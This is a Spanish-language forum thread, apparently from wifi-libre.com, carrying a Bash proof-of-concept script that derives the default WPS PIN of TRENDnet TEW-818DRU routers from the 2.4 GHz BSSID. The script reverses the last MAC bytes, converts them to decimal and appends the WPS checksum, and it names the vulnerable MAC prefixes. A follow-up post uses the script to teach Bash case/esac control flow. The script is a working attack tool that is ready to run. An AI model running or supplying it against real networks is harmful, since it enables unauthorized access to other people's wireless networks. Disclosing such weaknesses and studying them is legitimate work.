# 1) The first step in the algorithm consist in changing the order of the last three bytes of the 2.4 Ghz (b/g/n) bssid to get a string ( defined hin this code as the variable "$SCRAMBLEDNIC". )
# example : if the 2.4 Ghz bSSID is 00:90:4C:10:E4:D2 the string created would be D2E410 (value for $SCRAMBLEDNIC)
SCRAMBELDNIC=$(printf `echo $BSSID | awk -F':' '{ print $6 }'``echo $BSSID | awk -F':' '{ print $5 }'``echo $BSSID | awk -F':' '{ print $4 }'`) # with awk using ":" as a separtor we grab the last bytes of the mac inverting the order
# 2) Once this string is defined it has to be converted from hexadecimal to decimal. In the code the result is saved in the variable #"$CONVERTEDMAC". Some zero padding and reduction with module in base 10 are performed to get a 7 digit number saved in the variable $STRING
CONVERTEDMAC=$(printf '%d\n' 0x$SCRAMBELDNIC) # conversion from hexadecimal to decimal
STRING=`expr '(' $CONVERTEDMAC '%' 10000000 ')'` # suppression of the first digit if the string is longer than 7 digits
# The PIN is generated, we just have to add the WPS checksum to create a full valid WPS PIN with the function "CHECKSUM")
}
CHECKSUM(){ # The function checksum was written by antares_145 from crack-wifi.com
PIN=`expr 10 '*' $STRING` # And generate the 8th digit of a WPS PIN
ACCUM=0 #
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10000000 ')' '%' 10 ')'` # To generate it we multiply the first digit of the PIN by 3
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 1000000 ')' '%' 10 ')'` # The second digit by one
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 100000 ')' '%' 10 ')'` # The third digit by three
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 10000 ')' '%' 10 ')'` # etc...
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 1000 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 1 '*' '(' '(' $PIN '/' 100 ')' '%' 10 ')'`
ACCUM=`expr $ACCUM '+' 3 '*' '(' '(' $PIN '/' 10 ')' '%' 10 ')'` # ... we are done and all the results are sumed up in $ACCUM
DIGIT=`expr $ACCUM '%' 10` # we define our digit control: the sum reduced with base 10 to the unit number
CHECKSUM=`expr '(' 10 '-' $DIGIT ')' '%' 10` # the checksum is equal to " 10 minus digit control "
PIN=$(printf '%08d\n' `expr $PIN '+' $CHECKSUM`) # Some zero-padding in case that the value of the PIN is under 10000000
}
######################################################POC START HERE######################################################
echo -e "
$yellow .----------------. .----------------. .-----------------.
$yellow| .--------------. || .--------------. || .--------------. |
$yellow| |$red _________ $yellow | || |$red ________ $yellow | || |$red ____ _____$yellow | |
| |$red | _ _ |$yellow | || |$red |_ ___ .$yellow | || |$red|_ \|_ _|$yellow | |
| |$red |_/ | | \_|$yellow | || |$red | | . \ $yellow| || |$red | \ | |$yellow | |
| |$red | | $yellow | || |$red | | | | $yellow| || |$red | |\ \| |$yellow | |
| |$red _| |_ $yellow | || |$red _| |___.' / $yellow| || |$red _| |_\ |_ $yellow | |
| |$red |_____| $yellow | || |$red |________.' $yellow| || |$red|_____|\____|$yellow | |
| | | || | | || | | |
| '--------------' || '--------------' || '--------------' |$white.sh$yellow
'----------------' '----------------' '----------------'
$purpple DEFAULT PIN GENERATOR FOR$yellow TRENDNET$red TEW-818DRU$white VERSION.1$NOcolor ($red ac1900 $NOcolor)
$purpple AND$yellow TRENDNET$red TEW-818DRU$white VERSION.2$NOcolor ($red ac3200 $NOcolor)
GPL.3 code by$yellow kcdtv$NOcolor for
$red www.wifi-libre.com $yellow www.crack-wifi.com$NOcolor"
echo -e "$NOcolor"
echo -e "$green Macs vulnerables: $white 00:14:D1 - D8:EB:97 $NOcolor"
echo -e " --------------------------------------"
echo -e "$NOcolor"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID # bssid is introduced as a variable
echo -e "$NOcolor"
while !(echo $BSSID | tr a-f A-F | egrep -q "^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")
do # filter for checking the conformity bssid with loop over condition thanks to antares ;)
echo -e " $red Error :$white MAC No Conforme $NOcolor"
echo -e "$yellow*$NOcolor You must enter the full 2.4 ghz bSSID in hexadecimal format
(ex:$red 00:90:4C:10:E4:D2$NOcolor )"
echo -e "Insert the bSSID of the$white 2.4$NOcolor GHz wifi network:$yellow"
read -n 17 -ep " " BSSID
echo -e "$NOcolor"
done
######### update july the 1st pf 2015 for dk10v and the " awireless "X" project " :D #####################################################
# This part of the code shake if the mac adress belongs or not to trendnet
OUI=$( echo $BSSID | cut -c -8 ) # We grab the first half of the BSSID and store the value in $OUI
case $OUI in
D8:EB:97 | 00:14:D1 )
echo -e " $purpple OUI-CHECK :$white The mac adress belongs to TRENDnet"
;;
* )
echo -e " $red OUI-CHECK FAILED! $white The mac adress does not belong to TRENDnet"
;;
esac
ALGORITHM # function that scramble the NIC part of the bssid and convert it from decimal to hexadecimal
CHECKSUM # function that generate the correct wpschecksum and gives the full default WPS PIN for Tew-818DRU, credits to antares_145
echo -e "
$white The default$red PIN$white for 5ghz and 2,4ghz network is $victorycolor$PIN$NOcolor
$NOcolor for support visit$yellow www.wifi-libre.com$NOcolor
"
exit 0 salu2
Desconectado
#3 02-07-2015 11:13:23
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,730
Re: [Bash] Crear una estructura de control con una sentencia "case - esac"
Mirra, aprovecho de paso para explicar como haríamos para no generar el PIN si la mac no es de trendnet.
Al final del script 
Una vez que se acaba la estructura 
case esac se invocan las dos funciones para generar el PIN (algoritmo y checksum)
Luego es simplemente una orden echo y para acabar el script la instrucción de salida exit 0 < 0 es para una salida limpia en estado de éxito
La cuestión seria diferenciar los routeurs con mac trendnet y los que no para 1 en un caso generar el PIN y poner lo en consola
2 y en otro caso cerrar el script con un mensaje de error.
La diferenciación esta hecha ya , la acabamos de programar con la estructura de control con sentencia case esac.
En la case esac que hemos redactado solo damos una orden echo
Pero no estamos limitados... podemos poner las ordenes que queremos, solo tenemos que poner una instrucción de cierre ";;" para marcar el momento en que hemos acabado la secuencia de ordenes:
case expresion in
caso_1 )
comandos;;
caso_2 )
comandos;;
......
esac
nuestra sentencia es asi : caso 1 la mac es buena. Caso 2 la mac no es buena.
en el primer caso queremos hacer lo que hacia el script : generar el PIN y poner lo en consola ( algorithm + checksum + echo )
así que dejamos tal cual
case $OUI in
D8:EB:97 | 00:14:D1 )
echo -e " $purpple OUI-CHECK :$white The mac adress belongs to TRENDnet"
;;luego nos queda redactar el segundo caso : queremos poner el mensaje de error (mac no trendnet) y .... simplemente salir del script
y esto se hace con exit
lo que era :
* )
echo -e " $red OUI-CHECK FAILED! $white The mac adress does not belong to TRENDnet"
;;se transforma en
* )
echo -e " $red OUI-CHECK FAILED! $white The mac adress does not belong to TRENDnet"
exit 1
;;He simplemente añadido exit 1 (una salida en estado de error ya que "rompemos nuestro esac para salir y no genrar el PIN etc...)
con una sola orden obtienes lo que quieres: 
Desconectado
Temas similares
| Tema | Respuestas | Vistas | Ultimo mensaje |
|---|---|---|---|
|
¡Vienen grandes cambios! por Takomou
|
2 | 169 | Hoy 15:25:52 por Patcher |
|
Pegado: |
521 | 339996 | 10-05-2023 18:24:28 por Betis-Jesus |
|
|
27 | 1242 | 09-05-2023 21:32:44 por kcdtv |
|
Hacktivismo por CHARGER22
|
1 | 205 | 08-05-2023 19:53:26 por kcdtv |
|
Pegado: |
447 | 66090 | 22-04-2023 15:31:13 por kcdtv |
Información del usuario
Ultimo usuario registrado: klurosu
Usuarios registrados conectados: 0
Invitados conectados: 14
Estadisticas de los foros
Número total de usuarios registrados: 2,446
Número total de temas: 1,637
Número total de mensajes: 15,586
Atom tema feed - Impulsado por FluxBB
© 2014-2022 Wifi-libre.com - [ Generated in 0.032 seconds ]